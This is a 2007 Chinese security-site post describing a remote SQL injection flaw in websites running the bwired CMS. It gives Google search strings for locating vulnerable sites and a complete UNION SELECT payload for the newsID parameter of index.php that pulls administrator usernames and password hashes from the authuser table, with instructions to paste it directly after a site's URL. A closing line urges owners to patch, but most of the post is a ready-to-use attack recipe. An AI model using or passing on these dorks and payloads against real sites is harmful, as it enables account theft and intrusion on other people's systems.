国外网站又暴一高危漏洞 ----系统安装,电脑故障，中毒,杀毒,每日安全预敬----安全&焦点,电脑安全,系统安全,电脑漏洞,破解,高危漏洞,论坛漏洞，防黑技术,菜鸟入门,安全培训,系统主流漏洞报告，非主流病毒报告----coolmelife.com

电影下载

游戏视屏

电影在线

游戏下载

工具下载

回到主页

设为首页

07.7.22国外网站漏洞
更新时间：2007-7-24 12:49:14

--------------------------------------------------------------------------------

bwired (index.php newsID) Remote SQL Injection Vulnerability

国外Powered by bwired网站的新漏洞
推荐使用网址：google
搜索关键字‘"Powered by bwired" inurl:?newsID=’ Or ‘"Website by bwired" inurl:?newsID=’

使用方法：http://URL/[pathtobwired]/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

简单得说直接在地址后面粘贴 index.php后面即可~

--------------------------------------------------------------------------------

通过以上做法，黑客可以获取管理员帐号和密码的MD5码，属于高危漏洞!使用该系统的朋友请紧急修复!

按下Ctrl+D然后立即点Enter，你发现什么？